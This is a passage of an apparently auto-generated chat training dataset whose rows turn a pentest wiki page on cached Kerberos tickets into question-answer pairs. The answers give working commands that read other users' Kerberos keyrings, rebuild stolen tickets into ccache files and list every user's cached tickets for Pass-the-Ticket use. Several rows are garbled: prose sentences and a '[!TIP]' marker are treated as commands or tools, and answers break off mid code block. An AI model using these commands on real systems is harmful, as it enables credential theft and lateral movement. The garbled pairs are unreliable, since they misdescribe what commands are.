Security Authority Subsystem Service (LSASS).\nLSASS maintains an internal set of Kerberos logon sessions, each associated with a Logon Session ID (LUID). \n\nThese structures contain all credential material required by the Kerberos package, including:\n- Ticket Granting Ticket (TGT)\n- Ticket Granting Service (TGS)\n- Session keys\n- Associated metadata (encryption types, flags, validity periods)\n\nTickets are never stored on disk by the operating system. \n- Accessing or manipulating them requires interacting with LSASS memory and the Kerberos authentication package (via standard"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Cached Kerberos tickets - Storage Methods", "response": "== UNIX-like\n\nOn Linux and other UNIX-like systems, tickets can be stored in different ways:\n\n| Storage | Description |\n|-------------|-------------------------------------------------------------------------------------------------------------------------------------------|\n| FILE | Stores tickets in files, typically under /tmp directory, in the format krb5cc_%{uid} |\n| DIR | Stores tickets in a hierarchical directory-based cache, typically under /tmp which contains a primary file referencing the active ccache entry. | \n| KEYRING | Stores tickets in a dedicated kernel keyring space, only accessible to the ticket owner |\n| KCM | Stores tickets in an LDAP-like database, typically at /var/lib/sss/secrets/secrets.ldb (default when using sssd-kcm) |\n\nThe storage method is configured via the default_ccache_name parameter in /etc/krb5.conf, which is readable by all users.\n\n> [!NOTE]\n> This configuration can be overridden by files in /etc/krb5.conf.d/. When using SSSD, the value is typically set in /etc/krb5.conf.d/kcm_default_ccache\n\n== Windows️\n\nOn Windows systems, Kerberos tickets are stored in-memory within the Local Security Authority Subsystem Service (LSASS).\nLSASS maintains an internal set of Kerberos logon sessions, each associated with a Logon Session ID (LUID). \n\nThese structures contain all credential material required by the Kerberos package, including:\n- Ticket Granting Ticket (TGT)\n- Ticket Granting Service (TGS)\n- Session keys\n- Associated metadata (encryption types, flags, validity periods)\n\nTickets are never stored on disk by the operating system. \n- Accessing or manipulating them requires interacting with LSASS memory and the Kerberos authentication package (via standard", "metadata": {"corpus_index": 257, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/cached-kerberos-tickets.md", "page_title": "Cached Kerberos tickets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Cached Kerberos tickets - Storage Methods?"}, {"role": "assistant", "content": "== UNIX-like\n\nOn Linux and other UNIX-like systems, tickets can be stored in different ways:\n\n| Storage | Description |\n|-------------|-------------------------------------------------------------------------------------------------------------------------------------------|\n| FILE | Stores tickets in files, typically under /tmp directory, in the format krb5cc_%{uid} |\n| DIR | Stores tickets in a hierarchical directory-based cache, typically under /tmp which contains a primary file referencing the active ccache entry. | \n| KEYRING | Stores tickets in a dedicated kernel keyring space, only accessible to the ticket owner |\n| KCM | Stores tickets in an LDAP-like database, typically at /var/lib/sss/secrets/secrets.ldb (default when using sssd-kcm) |\n\nThe storage method is configured via the default_ccache_name parameter in /etc/krb5.conf, which is readable by all users.\n\n> [!NOTE]\n> This configuration can be overridden by files in /etc/krb5.conf.d/. When using SSSD, the value is typically set in /etc/krb5.conf.d/kcm_default_ccache\n\n== Windows️\n\nOn Windows systems, Kerberos tickets are stored in-memory within the Local Security Authority Subsystem Service (LSASS).\nLSASS maintains an internal set of Kerberos logon sessions, each associated with a Logon Session ID (LUID). \n\nThese structures contain all credential material required by the Kerberos package, including:\n- Ticket Granting Ticket (TGT)\n- Ticket Granting Service (TGS)\n- Session keys\n- Associated metadata (encryption types, flags, validity periods)\n\nTickets are never stored on disk by the operating system. \n- Accessing or manipulating them requires interacting with LSASS memory and the Kerberos authentication package (via standard"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Cached Kerberos tickets - Storage Methods?", "response": "== UNIX-like\n\nOn Linux and other UNIX-like systems, tickets can be stored in different ways:\n\n| Storage | Description |\n|-------------|-------------------------------------------------------------------------------------------------------------------------------------------|\n| FILE | Stores tickets in files, typically under /tmp directory, in the format krb5cc_%{uid} |\n| DIR | Stores tickets in a hierarchical directory-based cache, typically under /tmp which contains a primary file referencing the active ccache entry. | \n| KEYRING | Stores tickets in a dedicated kernel keyring space, only accessible to the ticket owner |\n| KCM | Stores tickets in an LDAP-like database, typically at /var/lib/sss/secrets/secrets.ldb (default when using sssd-kcm) |\n\nThe storage method is configured via the default_ccache_name parameter in /etc/krb5.conf, which is readable by all users.\n\n> [!NOTE]\n> This configuration can be overridden by files in /etc/krb5.conf.d/. When using SSSD, the value is typically set in /etc/krb5.conf.d/kcm_default_ccache\n\n== Windows️\n\nOn Windows systems, Kerberos tickets are stored in-memory within the Local Security Authority Subsystem Service (LSASS).\nLSASS maintains an internal set of Kerberos logon sessions, each associated with a Logon Session ID (LUID). \n\nThese structures contain all credential material required by the Kerberos package, including:\n- Ticket Granting Ticket (TGT)\n- Ticket Granting Service (TGS)\n- Session keys\n- Associated metadata (encryption types, flags, validity periods)\n\nTickets are never stored on disk by the operating system. \n- Accessing or manipulating them requires interacting with LSASS memory and the Kerberos authentication package (via standard", "metadata": {"corpus_index": 257, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/cached-kerberos-tickets.md", "page_title": "Cached Kerberos tickets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Cached Kerberos tickets - From UNIX-like systems"}, {"role": "assistant", "content": "== FILE Storage\n\nTickets are stored as files in the configured directory (default: /tmp). These files can be directly used for Pass-the-Ticket attacks.\n\n== DIR Storage\n\nUnlike the FILE: cache type, which stores all credentials in a single binary blob, the DIR: cache spreads the ccache content across multiple artifacts.\n\nThese files can still be extracted and used for Pass-the-Ticket attacks, but require collecting the entire directory rather than a single file.\n\n== KEYRING Storage\n\n> [!NOTE]\n> While root cannot directly read other users' keyring content, they can still access tickets by using su - $user\n\nThe keyctl utility (commonly pre-installed) can be used to read keyring content:\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Cached Kerberos tickets - From UNIX-like systems", "response": "== FILE Storage\n\nTickets are stored as files in the configured directory (default: /tmp). These files can be directly used for Pass-the-Ticket attacks.\n\n== DIR Storage\n\nUnlike the FILE: cache type, which stores all credentials in a single binary blob, the DIR: cache spreads the ccache content across multiple artifacts.\n\nThese files can still be extracted and used for Pass-the-Ticket attacks, but require collecting the entire directory rather than a single file.\n\n== KEYRING Storage\n\n> [!NOTE]\n> While root cannot directly read other users' keyring content, they can still access tickets by using su - $user\n\nThe keyctl utility (commonly pre-installed) can be used to read keyring content:\n\n```bash", "metadata": {"corpus_index": 258, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/cached-kerberos-tickets.md", "page_title": "Cached Kerberos tickets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Cached Kerberos tickets - From UNIX-like systems during a pentest?"}, {"role": "assistant", "content": "== FILE Storage\n\nTickets are stored as files in the configured directory (default: /tmp). These files can be directly used for Pass-the-Ticket attacks.\n\n== DIR Storage\n\nUnlike the FILE: cache type, which stores all credentials in a single binary blob, the DIR: cache spreads the ccache content across multiple artifacts.\n\nThese files can still be extracted and used for Pass-the-Ticket attacks, but require collecting the entire directory rather than a single file.\n\n== KEYRING Storage\n\n> [!NOTE]\n> While root cannot directly read other users' keyring content, they can still access tickets by using su - $user\n\nThe keyctl utility (commonly pre-installed) can be used to read keyring content:\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Cached Kerberos tickets - From UNIX-like systems during a pentest?", "response": "== FILE Storage\n\nTickets are stored as files in the configured directory (default: /tmp). These files can be directly used for Pass-the-Ticket attacks.\n\n== DIR Storage\n\nUnlike the FILE: cache type, which stores all credentials in a single binary blob, the DIR: cache spreads the ccache content across multiple artifacts.\n\nThese files can still be extracted and used for Pass-the-Ticket attacks, but require collecting the entire directory rather than a single file.\n\n== KEYRING Storage\n\n> [!NOTE]\n> While root cannot directly read other users' keyring content, they can still access tickets by using su - $user\n\nThe keyctl utility (commonly pre-installed) can be used to read keyring content:\n\n```bash", "metadata": {"corpus_index": 258, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/cached-kerberos-tickets.md", "page_title": "Cached Kerberos tickets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Show keyring content?"}, {"role": "assistant", "content": "keyctl show 30711432\n``\n\nIt will display the content of the keyring in a readable format.\n\n`\nKeyring\n 30711432 ---lswrv 0 65534 keyring: _persistent.0\n 127492740 --alswrv 0 0 \\_ keyring: _krb\n 556713767 --alswrv 0 0 \\_ user: krb_ccache:primary\n1002684101 --alswrv 0 0 \\_ keyring: 0\n 110355059 --alswrv 0 0 \\_ user: __krb5_princ__\n 575224320 --als-rv 0 0 \\_ big_key: krb5_ccache_conf_data/pa_type/krbtgt\\/LAB.LOCAL\\@LAB.LOCAL@X-CACHECONF:\n 161110247 --als-rv 0 0 \\_ big_key: krbtgt/LAB.LOCAL@LAB.LOCAL\n 760223933 --alswrv 0 0 \\_ user: __krb5_time_offsets__\n`\n\nTo reconstruct a Kerberos ticket, you need:\n1. The __krb5_princ__ value (in the example above, it's 110355059)\n2. The service key value (the big_key value. In the example above, it's 161110247)\n\n``bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Show keyring content?", "response": "keyctl show 30711432\n``\n\nIt will display the content of the keyring in a readable format.\n\n`\nKeyring\n 30711432 ---lswrv 0 65534 keyring: _persistent.0\n 127492740 --alswrv 0 0 \\_ keyring: _krb\n 556713767 --alswrv 0 0 \\_ user: krb_ccache:primary\n1002684101 --alswrv 0 0 \\_ keyring: 0\n 110355059 --alswrv 0 0 \\_ user: __krb5_princ__\n 575224320 --als-rv 0 0 \\_ big_key: krb5_ccache_conf_data/pa_type/krbtgt\\/LAB.LOCAL\\@LAB.LOCAL@X-CACHECONF:\n 161110247 --als-rv 0 0 \\_ big_key: krbtgt/LAB.LOCAL@LAB.LOCAL\n 760223933 --alswrv 0 0 \\_ user: __krb5_time_offsets__\n`\n\nTo reconstruct a Kerberos ticket, you need:\n1. The __krb5_princ__ value (in the example above, it's 110355059)\n2. The service key value (the big_key value. In the example above, it's 161110247)\n\n``bash", "metadata": {"corpus_index": 259, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/cached-kerberos-tickets.md", "page_title": "Cached Kerberos tickets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Show keyring content?"}, {"role": "assistant", "content": "keyctl show 30711432\n``\n\nIt will display the content of the keyring in a readable format.\n\n`\nKeyring\n 30711432 ---lswrv 0 65534 keyring: _persistent.0\n 127492740 --alswrv 0 0 \\_ keyring: _krb\n 556713767 --alswrv 0 0 \\_ user: krb_ccache:primary\n1002684101 --alswrv 0 0 \\_ keyring: 0\n 110355059 --alswrv 0 0 \\_ user: __krb5_princ__\n 575224320 --als-rv 0 0 \\_ big_key: krb5_ccache_conf_data/pa_type/krbtgt\\/LAB.LOCAL\\@LAB.LOCAL@X-CACHECONF:\n 161110247 --als-rv 0 0 \\_ big_key: krbtgt/LAB.LOCAL@LAB.LOCAL\n 760223933 --alswrv 0 0 \\_ user: __krb5_time_offsets__\n`\n\nTo reconstruct a Kerberos ticket, you need:\n1. The __krb5_princ__ value (in the example above, it's 110355059)\n2. The service key value (the big_key value. In the example above, it's 161110247)\n\n``bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Show keyring content?", "response": "keyctl show 30711432\n``\n\nIt will display the content of the keyring in a readable format.\n\n`\nKeyring\n 30711432 ---lswrv 0 65534 keyring: _persistent.0\n 127492740 --alswrv 0 0 \\_ keyring: _krb\n 556713767 --alswrv 0 0 \\_ user: krb_ccache:primary\n1002684101 --alswrv 0 0 \\_ keyring: 0\n 110355059 --alswrv 0 0 \\_ user: __krb5_princ__\n 575224320 --als-rv 0 0 \\_ big_key: krb5_ccache_conf_data/pa_type/krbtgt\\/LAB.LOCAL\\@LAB.LOCAL@X-CACHECONF:\n 161110247 --als-rv 0 0 \\_ big_key: krbtgt/LAB.LOCAL@LAB.LOCAL\n 760223933 --alswrv 0 0 \\_ user: __krb5_time_offsets__\n`\n\nTo reconstruct a Kerberos ticket, you need:\n1. The __krb5_princ__ value (in the example above, it's 110355059)\n2. The service key value (the big_key value. In the example above, it's 161110247)\n\n``bash", "metadata": {"corpus_index": 259, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/cached-kerberos-tickets.md", "page_title": "Cached Kerberos tickets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use It for show keyring content?"}, {"role": "assistant", "content": "It will display the content of the keyring in a readable format."}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use It for show keyring content?", "response": "It will display the content of the keyring in a readable format.", "metadata": {"corpus_index": 260, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/cached-kerberos-tickets.md", "page_title": "Cached Kerberos tickets", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "It"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Show keyring content during a pentest?"}, {"role": "assistant", "content": "It will display the content of the keyring in a readable format."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Show keyring content during a pentest?", "response": "It will display the content of the keyring in a readable format.", "metadata": {"corpus_index": 260, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/cached-kerberos-tickets.md", "page_title": "Cached Kerberos tickets", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `It will display the content of the keyring in a readable format.`?"}, {"role": "assistant", "content": "This command is used for show keyring content. Show keyring content"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `It will display the content of the keyring in a readable format.`?", "response": "This command is used for show keyring content. Show keyring content", "metadata": {"corpus_index": 260, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/cached-kerberos-tickets.md", "page_title": "Cached Kerberos tickets", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the To command for show keyring content"}, {"role": "assistant", "content": "To reconstruct a Kerberos ticket, you need:\n1. The `__krb5_princ__` value (in the example above, it's `110355059`)\n2. The service key value (the `big_key` value. In the example above, it's `161110247`)"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the To command for show keyring content", "response": "To reconstruct a Kerberos ticket, you need:\n1. The `__krb5_princ__` value (in the example above, it's `110355059`)\n2. The service key value (the `big_key` value. In the example above, it's `161110247`)", "metadata": {"corpus_index": 261, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/cached-kerberos-tickets.md", "page_title": "Cached Kerberos tickets", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "To"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Show keyring content during a pentest?"}, {"role": "assistant", "content": "To reconstruct a Kerberos ticket, you need:\n1. The `__krb5_princ__` value (in the example above, it's `110355059`)\n2. The service key value (the `big_key` value. In the example above, it's `161110247`)"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Show keyring content during a pentest?", "response": "To reconstruct a Kerberos ticket, you need:\n1. The `__krb5_princ__` value (in the example above, it's `110355059`)\n2. The service key value (the `big_key` value. In the example above, it's `161110247`)", "metadata": {"corpus_index": 261, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/cached-kerberos-tickets.md", "page_title": "Cached Kerberos tickets", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `To reconstruct a Kerberos ticket, you need:`?"}, {"role": "assistant", "content": "This command is used for show keyring content. Show keyring content"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `To reconstruct a Kerberos ticket, you need:`?", "response": "This command is used for show keyring content. Show keyring content", "metadata": {"corpus_index": 261, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/cached-kerberos-tickets.md", "page_title": "Cached Kerberos tickets", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Get service key in the context of penetration testing"}, {"role": "assistant", "content": "keyctl print $KEY_ADDRESS\n\nThe result will be an hexadecimal string, that can be appended to the ticket header to reconstruct the full ticket."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Get service key in the context of penetration testing", "response": "keyctl print $KEY_ADDRESS\n\nThe result will be an hexadecimal string, that can be appended to the ticket header to reconstruct the full ticket.", "metadata": {"corpus_index": 262, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/cached-kerberos-tickets.md", "page_title": "Cached Kerberos tickets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Get service key"}, {"role": "assistant", "content": "keyctl print $KEY_ADDRESS\n\nThe result will be an hexadecimal string, that can be appended to the ticket header to reconstruct the full ticket."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Get service key", "response": "keyctl print $KEY_ADDRESS\n\nThe result will be an hexadecimal string, that can be appended to the ticket header to reconstruct the full ticket.", "metadata": {"corpus_index": 262, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/cached-kerberos-tickets.md", "page_title": "Cached Kerberos tickets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Reconstruct ticket"}, {"role": "assistant", "content": "HEADER='0504000c00010008ffffffff00000000'\nPRINCIPALS=$(keyctl print $PRINCIPALS_ADDRESS | awk -F : '{print $3}')\nKEY=$(keyctl print $KEY_ADDRESS | awk -F : '{print $3}')\nticket=$HEADER$PRINCIPALS$KEY"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Reconstruct ticket", "response": "HEADER='0504000c00010008ffffffff00000000'\nPRINCIPALS=$(keyctl print $PRINCIPALS_ADDRESS | awk -F : '{print $3}')\nKEY=$(keyctl print $KEY_ADDRESS | awk -F : '{print $3}')\nticket=$HEADER$PRINCIPALS$KEY", "metadata": {"corpus_index": 263, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/cached-kerberos-tickets.md", "page_title": "Cached Kerberos tickets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Reconstruct ticket during a pentest?"}, {"role": "assistant", "content": "HEADER='0504000c00010008ffffffff00000000'\nPRINCIPALS=$(keyctl print $PRINCIPALS_ADDRESS | awk -F : '{print $3}')\nKEY=$(keyctl print $KEY_ADDRESS | awk -F : '{print $3}')\nticket=$HEADER$PRINCIPALS$KEY"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Reconstruct ticket during a pentest?", "response": "HEADER='0504000c00010008ffffffff00000000'\nPRINCIPALS=$(keyctl print $PRINCIPALS_ADDRESS | awk -F : '{print $3}')\nKEY=$(keyctl print $KEY_ADDRESS | awk -F : '{print $3}')\nticket=$HEADER$PRINCIPALS$KEY", "metadata": {"corpus_index": 263, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/cached-kerberos-tickets.md", "page_title": "Cached Kerberos tickets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Save to file?"}, {"role": "assistant", "content": "echo \"$ticket\" | xxd -r -p > ticket.ccache\n``\n\n> [!TIP]\n> CCacheExtractor can automate this process:\n> `bash\n> python3 ccacheExtractor.py keyring --principals $PRINCIPALS --key $KEY\n> `\n\nA domain joined machine can cache lots of tickets from different users. It would be tedious to list them all manually.\nTo list all available tickets, the /proc/key-users file can be used. It's readable by all users and contains the list of all users with persistent keyrings.\n\n``bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Save to file?", "response": "echo \"$ticket\" | xxd -r -p > ticket.ccache\n``\n\n> [!TIP]\n> CCacheExtractor can automate this process:\n> `bash\n> python3 ccacheExtractor.py keyring --principals $PRINCIPALS --key $KEY\n> `\n\nA domain joined machine can cache lots of tickets from different users. It would be tedious to list them all manually.\nTo list all available tickets, the /proc/key-users file can be used. It's readable by all users and contains the list of all users with persistent keyrings.\n\n``bash", "metadata": {"corpus_index": 264, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/cached-kerberos-tickets.md", "page_title": "Cached Kerberos tickets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Save to file"}, {"role": "assistant", "content": "echo \"$ticket\" | xxd -r -p > ticket.ccache\n``\n\n> [!TIP]\n> CCacheExtractor can automate this process:\n> `bash\n> python3 ccacheExtractor.py keyring --principals $PRINCIPALS --key $KEY\n> `\n\nA domain joined machine can cache lots of tickets from different users. It would be tedious to list them all manually.\nTo list all available tickets, the /proc/key-users file can be used. It's readable by all users and contains the list of all users with persistent keyrings.\n\n``bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Save to file", "response": "echo \"$ticket\" | xxd -r -p > ticket.ccache\n``\n\n> [!TIP]\n> CCacheExtractor can automate this process:\n> `bash\n> python3 ccacheExtractor.py keyring --principals $PRINCIPALS --key $KEY\n> `\n\nA domain joined machine can cache lots of tickets from different users. It would be tedious to list them all manually.\nTo list all available tickets, the /proc/key-users file can be used. It's readable by all users and contains the list of all users with persistent keyrings.\n\n``bash", "metadata": {"corpus_index": 264, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/cached-kerberos-tickets.md", "page_title": "Cached Kerberos tickets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Save to file during a pentest?"}, {"role": "assistant", "content": "> [!TIP]\n> [CCacheExtractor](https://github.com/Hakumarachi/ccacheExtractor) can automate this process:\n> ```bash\n> python3 ccacheExtractor.py keyring --principals $PRINCIPALS --key $KEY\n> ```\n\nA domain joined machine can cache lots of tickets from different users. It would be tedious to list them all manually.\nTo list all available tickets, the `/proc/key-users` file can be used. It's readable by all users and contains the list of all users with persistent keyrings."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Save to file during a pentest?", "response": "> [!TIP]\n> [CCacheExtractor](https://github.com/Hakumarachi/ccacheExtractor) can automate this process:\n> ```bash\n> python3 ccacheExtractor.py keyring --principals $PRINCIPALS --key $KEY\n> ```\n\nA domain joined machine can cache lots of tickets from different users. It would be tedious to list them all manually.\nTo list all available tickets, the `/proc/key-users` file can be used. It's readable by all users and contains the list of all users with persistent keyrings.", "metadata": {"corpus_index": 265, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/cached-kerberos-tickets.md", "page_title": "Cached Kerberos tickets", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `> [!TIP]`?"}, {"role": "assistant", "content": "This command is used for save to file. Save to file"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `> [!TIP]`?", "response": "This command is used for save to file. Save to file", "metadata": {"corpus_index": 265, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/cached-kerberos-tickets.md", "page_title": "Cached Kerberos tickets", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain List all tickets"}, {"role": "assistant", "content": "for uid in $(awk '{print$1}' /proc/key-users | tr -d :); do\n res=$(KRB5CCNAME=KEYRING:persistent:$uid klist 2>&1)\n if [ $? -eq 0 ]; then\n echo -e \"\\n=== UID $uid ===\"\n echo \"$res\"\n fi\ndone"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain List all tickets", "response": "for uid in $(awk '{print$1}' /proc/key-users | tr -d :); do\n res=$(KRB5CCNAME=KEYRING:persistent:$uid klist 2>&1)\n if [ $? -eq 0 ]; then\n echo -e \"\\n=== UID $uid ===\"\n echo \"$res\"\n fi\ndone", "metadata": {"corpus_index": 266, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/cached-kerberos-tickets.md", "page_title": "Cached Kerberos tickets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has 